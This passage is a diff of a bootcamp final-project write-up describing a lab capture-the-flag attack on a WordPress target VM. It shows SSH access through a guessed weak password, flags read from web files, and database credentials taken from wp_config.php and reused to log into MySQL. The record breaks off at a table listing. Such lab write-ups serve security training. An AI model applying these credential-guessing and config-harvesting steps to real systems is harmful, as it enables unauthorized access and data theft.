jvatianou/cyber-bootcamp/FinalProject/Offensive.md

     Attackers were then easily able to `ssh` into the target by guessing the weak password of user `michael`, which was "michael".

-    ssh michael@192.168.1.110
+    > ssh michael@192.168.1.110
-    michael@192.168.1.110's password:
+    > michael@192.168.1.110's password:

-    michael@target1:~$ ls
+    > michael@target1:~$ ls

     Attackers were then able to use `grep` to find "flag1" inside of /var/www/html/service.html:

-    cat /var/www/html/service.html:			<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->
+    > cat /var/www/html/service.html:			<!-- flag1{b9bbcb33e11b80be759c4e844862482d} -->

     Found flag2 the same way.
 Traversed the file system and found inside the /var/www directory.

-    michael@target1:~$ cat /var/www/flag2.txt
+    > michael@target1:~$ cat /var/www/flag2.txt
-    flag2{fc3fd58dcdad9ab23faca6e9a36e581c}
+    > flag2{fc3fd58dcdad9ab23faca6e9a36e581c}

   - Insecure password

     As the attackers were further searching the system, found credentials for the Wordpress database inside of /var/www/html/wp_config.php:

-    /** The name of the database for WordPress */ define('DB_NAME', 'wordpress');
+    > /** The name of the database for WordPress */ define('DB_NAME', 'wordpress');

-    /** MySQL database username */
+    > /** MySQL database username */
     define('DB_USER', 'root');

-    /** MySQL database password */
+    > /** MySQL database password */
     define('DB_PASSWORD', 'R@v3nSecurity');

     Used those credentials to get into the Wordpress database and find flag3:

-    michael@target1:~$ mysql -u root -p wordpress Enter password:
+    > ichael@target1:~$ mysql -u root -p wordpress Enter password:
       Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

-Welcome to the MySQL monitor.
+    >  Welcome to the MySQL monitor.
 Commands end with ; or \g.
       Your MySQL connection id is 42
       Server version: 5.5.60-0+deb8u1 (Debian)

       Copyright (c) 2000, 2018, Oracle and/or its affiliates.
 All rights reserved.

-Oracle is a registered trademark of Oracle Corporation and/or its affiliates.
-Other names may be trademarks of their respective owners.

-Type 'help;' or '\h' for help.
-Type '\c' to clear the current input statement.

-mysql> use wordpress;
+> mysql> use wordpress;
 Database changed
 mysql> show tables;
 +-----------------------+